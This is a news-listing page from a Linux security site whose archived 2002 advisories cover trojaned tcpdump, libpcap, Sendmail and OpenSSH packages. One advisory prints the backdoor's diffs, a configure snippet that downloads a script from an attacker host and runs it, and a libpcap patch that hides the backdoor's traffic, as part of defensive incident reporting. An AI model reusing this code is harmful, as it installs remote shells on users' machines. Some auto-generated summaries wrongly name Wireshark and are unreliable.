Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found 1 articles for you...
74
tcpdumppacket capturenetwork analysisCapture Network Packets Remotely Using Cisco Router and Tcpdump
Have you ever thought about your routers. I mean - *really* thought about them? They think all day long, processing all of the packets in and out of your company. PC's with almost any operating system can be configured with tcpdump or windump (with wireshark or whatever gui you'd care to hang in front of it) to do packet capture an analysis. But if the traffic you are trying to capture is halfway across the world (or maybe closer but still too far to drive), can you use your router to capture packets in a standard libpcap format? As you've probably guessed, the answer is YES, or else there The link for this article located at SANS is no longer available. . PC's with almost any operating system can be configured with tcpdump or windump (with wireshark or w. thought, about, routers, *really*, think. . Anthony Pell
Nov 20, 2009
•
Network Security
83
security advisorytcpdumpsendmailTrojan Horse Impact on Sendmail, OpenSSH, and tcpdump Software
At least three commonly used open source software packages were altered by black-hat (bad-guy) hackers to contain "Trojan horse" code this year. The three most commonly used packages affected were Sendmail, OpenSSH and tcpdump/libpcap. Others to be modified included BitchX, . . . . At least three commonly used open source software packages were altered by black-hat (bad-guy) hackers to contain "Trojan horse" code this year. The three most commonly used packages affected were Sendmail, OpenSSH and tcpdump/libpcap. Others to be modified included BitchX, a chat client, and Fragrouter, a network security tool. In all of these cases, the unknown cracker gained entry to the relevant download sites and embedded the back door code in the installation packages. The link for this article located at ZDNet.com.au is no longer available. . At least three commonly used open source software packages were altered by black-hat (bad-guy) hacke. least, three, commonly, source, software, packages, altered, black-hat, (bad-guy), hacke. . LinuxSecurity.com Team
Dec 27, 2002
•
Hacks/Cracks
83
security advisorytcpdumpnetwork monitoringTcpdump and Libpcap Security Advisory: Spyware Attack Detected
Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software. . .. Security experts warn system administrators that rogue hackers have implanted spyware in the latest version of a popular open-source network-monitoring tool and its code library. The main Web site for downloading a popular open-source network-monitoring tool remained off-line Thursday following a revelation that rogue hackers had implanted spyware in the latest version of the software . Copies of tcpdump, a utility for monitoring data traffic on a network, and its library of code, called libpcap, had both been corrupted on the site, according to Michael Richardson, Webmaster for the site and a member of the open-source project that maintains the tools. "The server has been taken down until we can be sure we have found the problem," Richardson said in a phone interview Thursday. However, other sites had already downloaded the software from the main server and hosted the files on their own computers, a practice known as mirroring. It's unknown how many of these other sites have corrupted copies of the code, said Richardson, although some have already confirmed that they have found the Trojan horse. Tcpdump is a utility used by Unix, Linux and BSD system administrators to monitor--or "sniff"--the data that passes over the network. Libpcap is a code library that helps programmers write programs to tap into network data on many different platforms. The spyware component of the tainted software--called "conftes.c"--enables the hackers to send and execute any command on computers that contain the modified utility. The attack bears some hallmarks of a group of hackers that struck two other open-source projects,Sendmail and OpenSSH, in October. Specifically, the Trojan horse has commands that can be triggered by using the letters a, d and m--the name of a major underground hacking group. Whether the actual hackers were members of ADM, were framing the group, or were just using the group's tools is unknown. The hackers apparently broke into the server over the weekend from a computer in Finland and replaced the code with a corrupted version. The infected software remained available for more than two days because, Richardson said, he had been away from the main server, located in Canada, and the people who found the problem--members of the Houston Linux Users Group--didn't notify him. "It would have been nice to have a little bit more warning," Richardson said. "No one contacted me from that group." Matt Solnik, president of the Houston Linux Users Group, said the group contacted one of the other members of the tcpdump project less than an hour after realizing the software had been compromised. Another HLUG member, Russell Adams, had been installing Snort, an open-source intrusion detection system that uses the libpcap library, when a test that matches the software package with a unique fingerprint failed. The fingerprints, known more formally as digital signatures, are used as a security measure to make sure the software can't be surreptitiously changed. "He found some interesting code and we looked over it and found that it was a Trojan," Solnik said. By Tuesday night, HLUG had extracted the Trojan horse and had started notifying tcpdump's maintainers, said Solnik. Richardson expects to start analyzing the server Thursday night. He couldn't say when the project's server would again be available. More information is available in an advisory released by Carnegie Mellon University's Computer Emergency Response Team (CERT) Coordination Center. The link for this article located at News.com is no longer available. . Malicious actors embed malware within the most recent release of wireshark,jeopardizing data analysis applications, authorities caution.. tcpdump, libpcap, spyware attack, malware detection, network tools. . LinuxSecurity.com Team
Nov 14, 2002
•
Hacks/Cracks
83
security advisorytcpdumpmalwareTcpdump.org Incident: Trojan Found in Downloaded Utilities
The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software allows the hacker that wrote it to access any machine on which the modified software is run. . .. The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11, and the software available for download was modified to contain Trojan Horse code. This Trojan Horse, or "back door" software allows the hacker that wrote it to access any machine on which the modified software is run . The two software items affected are tcpdump and libpcap, tools commonly used in information security applications. Some Intrusion Detection System (IDS) software requires libpcap. This is the most recent in a string of similar attacks. Sendmail, one of the most widely used e-mail server software packages, was also "trojaned" recently. Others affected in recent months have included OpenSSH, the secure remote access software, and even Fragroute, a hacker utility. The identity of the hacker conducting this campaign is unknown, as is whether a connection exists between the separate incidents. CERT released an advisory in which they ".encourage sites using libpcap and tcpdump to verify the authenticity of their distribution, regardless of where it was obtained." CERT provided the information necessary to determine the authenticity of any libpcap or tcpdump software recently downloaded. The advisory also encourages users to verify all software before installing it. "As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software." The link for this article located at ZDNet is no longer available. . The download site for two very common Linux based utilities, tcpdump.org, was hacked into on Nov. 11. download, common, linux, based, utilities, tcpdump, hacked. . LinuxSecurity.com Team
Nov 14, 2002
•
Hacks/Cracks
83
security advisorytcpdumpnetwork monitoringTcpdump & Libpcap Trojan Alert: Significant Exploit Detected
tcpdump and libpcap were trojaned on tcpdump.org and all but 1 official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught Gentoo's Portage System. When the configure script is run, it downloads a script from mars.rakeeti.net. This script contains an embedded shell that creates and compiles a C source file not part of the tcpdump/libpcap dsitrobution.. . . . tcpdump and libpcap were trojaned on tcpdump.org and all but 1 official mirror. This trojan, similar to the OpenSSH trojan from a few months ago, was caught Gentoo's Portage System. When the configure script is run, it downloads a script from mars.rakeeti.net. This script contains an embedded shell that creates and compiles a C source file not part of the tcpdump/libpcap dsitrobution. Latest libpcap & tcpdump sources from tcpdump.org contain a trojan. Background: Libpcap provides a packet sniffing library for programs like Snort. Tcpdump is a standard tool for packet sniffing. Details: The trojan contains modifications to the configure script and gencode.c (in libpcap only). The configure script downloads which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: A - program exits D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. This is similar to the OpenSSH trojan a few months ago. Updates: Many Mirrors are infected with the trojan!!! MainMirror Site (wiretapped.net) will no longer be providing tcpdump downloads until things are straightened out. Good sources: MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: tcpdump tcpdump MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1> /dev/null 2> /dev/null & The "services" payload: trojan-script, the non-obfuscated portion (excerpted) services, the complete version Thanks to: Russell Adams Mathew Solnik Scott Stout with the Houston Linux Users Group . Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums. Last update: Wed Nov 13 03:44:08 CST 2002 . Compromised scripts infected Wireshark and TShark repositories across various distribution points, creating a critical vulnerability.. tcpdump Exploits, Libpcap Security, Network Monitoring, Malware Attacks. . LinuxSecurity.com Team
Nov 13, 2002
•
Hacks/Cracks
74
tcpdumpnetwork analysisSANSIn-Depth TCP/IP And Tcpdump Manual Created By SANS Professionals
Sans has provided a TCP/IP and tcpdump flyer guide. . Sans has provided a TCP/IP and tcpdump flyer guide. The link for this article located at SANS is no longer available. . Dive into the ultimate TCP/IP and tcpdump resource handbook by SANS. Ideal for networking experts and hobbyists alike.. Tcpdump Usage, Networking Protocols Overview, TCP/IP Guide. . Anthony Pell
May 01, 2002
•
Network Security
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Explore top 10 tips to secure your open-source projects now. Read More